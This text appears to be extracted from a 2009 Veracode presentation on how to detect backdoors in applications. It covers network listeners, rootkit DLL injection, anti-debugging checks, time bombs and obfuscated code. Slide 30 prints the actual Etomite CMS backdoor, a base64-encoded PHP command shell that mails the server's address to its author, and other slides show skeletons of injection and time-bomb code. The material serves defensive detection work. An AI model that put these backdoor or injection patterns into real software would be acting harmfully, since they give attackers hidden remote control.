  • 26. Detection (cont’d) Identify comparisons with specific IP addresses or DNS names – In C, start with all calls to socket API functions such as getpeername(), gethostbyname(), and gethostbyaddr() – Comparisons against the results of these functions are suspicious – Don’t forget to look at ports as well © 2009 Veracode, Inc. 26
  • 28. Characteristics Listens on an undocumented port Makes outbound connections Leaks information over the network – Reads from sensitive data resources – Sends data out via SMTP, HTTP, UDP, ICMP, or other protocols Potentially combined with rootkit behavior to hide the network activity from host-based IDS In the movie, Konstantin Konali markets a computer game that everyone in the world is playing. With a sequel to the game he wants to put backdoors in all computer systems on which it gets installed, thus providing access to the police and other government systems. © 2009 Veracode, Inc. 28
  • 29. Etomite CMS 0.6 (2006) PHP file modified to allow remote command injection Also sends a beacon via e-mail to a hard-coded e-mail address with the location of the compromised server Base64 encoding strikes again © 2009 Veracode, Inc. 29
  • 30. Etomite CMS (cont’d) eval(base64_decode("JGhhbmRsZT1wb3BlbigkX0dFVFtjaWpdLiIgMj4mMSIsInIiKTt3aGlsZS ghZmVvZigkaGFuZGxlKSl7JGxpbmU9ZmdldHMoJGhhbmRsZSk7aWYoc3RybGVuKCRsaW5lKT49MSl7 ZWNobyAkbGluZTt9fXBjbG9zZSgkaGFuZGxlKTttYWlsKCJjaWpmZXJAbmV0dGkuZmkiLCIiLiRfU0 VSVkVSWydTRVJWRVJfTkFNRSddLiRfU0VSVkVSWydQSFBfU0VMRiddLCJFcnJvciBDb2RlICM3MjA5 MzgiKTs=")); which decodes to: $handle=popen($_GET[cij]." 2>&1","r"); while(!feof($handle)) { $line=fgets($handle); if(strlen($line)>=1) { echo $line; } } pclose($handle); mail("cijfer@netti.fi","".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF'], "Error Code #720938"); © 2009 Veracode, Inc. 30
  • 31. Detection Identify potential sources of sensitive information – All calls to known crypto API functions – Functions that handle sensitive data such as encryption keys, plaintext data to be encrypted, registry keys, specific file references, process information, etc. – Note the variable references that correspond to the sensitive data – Analyze data flow to identify other places these variables are used, outside of the expected set of “safe” functions, such as: Other crypto API calls strlen(), bzero(), memset(), etc. © 2009 Veracode, Inc. 31
  • 32. Detection (cont’d) Identify outbound connections – In C, start with all calls to socket API functions such as connect(), sendto(), or Win32 API equivalents – Focus on any outbound connections to hard-coded IP addresses or ports – Analyze data flow to determine what type of information is being sent out Look for calls to standard file I/O or registry functions – some other piece of the backdoor could be populating the data in that location – Scripting languages such as PHP also have special function calls implementing protocols such as SMTP via the mail() function – Keep in mind that many applications automatically check the manufacturer website for updates © 2009 Veracode, Inc. 32
  • 33. Detection (cont’d) Identify unauthorized listeners – In C, start with all calls to socket API functions such as bind(), recvfrom(), or Win32 API equivalents – Some knowledge of normal application traffic will be required to determine which ports, if any, are unauthorized listeners Profile binaries by examining import tables – Identify anomalies, such as the use of network APIs by a desktop-only application Unix: readelf, objdump, nm Win32: PEDump (console), PEBrowse (GUI) – Dig in deeper with a disassembler and trace code paths to the anomalous API calls © 2009 Veracode, Inc. 33
  • 35. Look for indicators of malicious code Indicators are not malicious by themselves but they often coincide with malicious code. They obfuscate behavior from dynamic or static analysis. Categories – Rootkit behavior – Anti-debugging – Time bombs – Code or data anomalies © 2009 Veracode, Inc. 35
  • 36. Rootkit Behavior Modifies OS behavior Hides program behavior from system administration tools or other instrumentation © 2009 Veracode, Inc. 36
  • 37. Detecting rootkit behavior – Using Window hooks Inject a DLL via windows hook calls. The call SetWindowsHookEx will hook a target process and load a DLL of our choosing into the target process. This DLL could then hook the IAT or execute inline hooking as desired. For example: myDllHandle = Rootkit DLL SetWindowsHookEx(WH_KEYBOARD, myKeyBrdFuncAd, myDllHandle, 0) Rootkit DLL has the myKeyBrdFuncAd defined and written. © 2009 Veracode, Inc. 37
  • 38. Detecting rootkit behavior - Using Remote Threads Inject a DLL into a target process by creating and using remote threads. // This is used to find the PID of our target process PID = OpenProcess(DWORD dwDesiredAccess, BOOL bInheritHandle, DWORD dwProcessId); // This is used to find the address of LoadLibraryA in our current process. We assume that the base is the same in our target thus keeping the function location the same. ADDRESS = GetProcAddress(GetModuleHandle(TEXT( "Kernel32")), "LoadLibraryA"); // The below allocates some memory in our target process BASEAD = VirtualAllocEx(PID, NULL, len_of_our_dll_name_string, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE) WriteProcessMemory(PID, BASEAD, Pointer to BUF containing "c:pathtoourdll", size, NULL) CreateRemoteThread(PID, NULL, 0, ADDRESS, BASEAD, 0, NULL) © 2009 Veracode, Inc. 38
  • 39. Detecting Anti-debugging Anti-debugging is the implementation of one or more techniques within computer code that hinders attempts at reverse engineering or debugging a target binary. Used by commercial executable protectors, packers, and malicious software, to prevent or slow-down the process of reverse- engineering. © 2009 Veracode, Inc. 39
  • 40. Detecting Anti-debugging IsDebuggerPresent Windows API The IsDebuggerPresent API call checks to see if a debugger is attached to the running process. This is a Windows specific API call that checks the process environment block (PEB) for the PEB!BeingDebugged flag and returns its value. CheckRemoteDebuggerPresent Windows API The CheckRemoteDebuggerPresent API call takes two parameters. The first parameter is a handle to the target process while the second parameter is a return value indicating if the target process is currently running under a debugger. The word “remote” within CheckRemoteDebuggerPresent does not require that the target processbe running on a separate system. © 2009 Veracode, Inc. 40
  • 41. Detecting Anti-debugging OutputDebugString on Win2K and WinXP The function OutputDebugString operates differently based on the presence of a debugger. The return error message can be analyzed to determine if a debugger is present. If a debugger is attached, OutputDebugString does not modify the GetLastError message. FindWindow OllyDbg by default has a window class of "OLLYDBG". This can be detected using a function call to FindWindow with a first parameter of "OLLYDBG". WinDbg can be detected with an identical method instead searching for the string WinDbgFrameClass. OllyDbg OpenProcess HideDebugger Detection The "Hide Debugger" plugin for OllyDbg modifies the OpenProcess function at offset 0x06. The plugin places a far jump (0xEA) in that location in an attempt to hook OpenProcess calls. This can be detected programmatically and acted upon. © 2009 Veracode, Inc. 41
  • 42. Detecting Time Bombs Definition – A piece of code intentionally inserted into a software system that will set off a malicious function when specified time based conditions are met Program behavior to look for – Time comparison functions – Time retrieval functions © 2009 Veracode, Inc. 42
  • 43. Time Bombs Code constructs – If Based Static Compare if( time(NULL) > 1234567890 ) { // Could be any time/date retrieval function // 1234567890 == February 13th, 2009 ... } – Init/Diff Check Init - Executed during process initialization stage time(&time1); Diff Check – Executed during long running application loop time(&time2); // Get current time (this is run periodically *daily for example* in process execution loop // Could be any time retrieval function if(difftime(time1, time2) > 1000) { // Could be any of a number of different comparison methods including subtraction BOOM(); } © 2009 Veracode, Inc. 43
  • 44. Time Bombs – Init/Diff Trigger File Init: During process initialization create trigger file (+30 days in example below) GetFileTime(file, &ft, NULL, NULL); qwResult = (((ULONGLONG) ft.dwHighDateTime) << 32) + ft.dwLowDateTime; qwResult += 30 * _DAY; // Add 30 days to the retrieved file time in memory (DWORD) (qwResult & 0xFFFFFFFF ); ft.dwHighDateTime = (DWORD) (qwResult >> 32 ); ret = SetFileTime(file, &ft, &ft, &ft); // Set the trigger file time to new time (+30Days) CloseHandle(file); Diff Trigger Check – Executed during long running application loop GetFileTime((HANDLE)file, &ft, NULL, NULL); GetSystemTimeAsFileTime(&ft2); if((CompareFileTime(&ft, &ft2)) == -1) { BOOM(); } © 2009 Veracode, Inc. 44
  • 45. Time Bombs Time Retrieval Functions – Direct requests for time/date – Shell time/date – File system time/date Time Formatting/Conversion Functions – Windows time / date formatting functions Can also be used to GET time / date values – Able to handle time values passed through conversions Time Difference Functions – Able to support multiple time difference functions © 2009 Veracode, Inc. 45
  • 46. Identify code or data anomalies Self-modifying code – Calling eval(obfuscated code) in scripting languages – Writing into code pages or jumping/calling into data pages Unreachable code – May be part of a two-stage backdoor insertion where code is added later that calls the unreachable code Encrypted blocks of data © 2009 Veracode, Inc. 46
  • 48. SDLC: When To Scan For Backdoors? Scan the code you are developing or maintaining before release Acceptance testing of binary code – Code delivered to you as .exe, .dll, .lib, .so Scan post development/duplication/delivery phases (samples) Validation that your development tool chain isn’t inserting backdoors Ken Thompson’s paper, “Reflections on Trusting Trust” – http://www.acm.org/classics/sep95/ – Thompson not only backdoored the compiler so it created backdoors, he backdoored the disassembler so it couldn’t be used to detect his backdoors! © 2009 Veracode, Inc. 48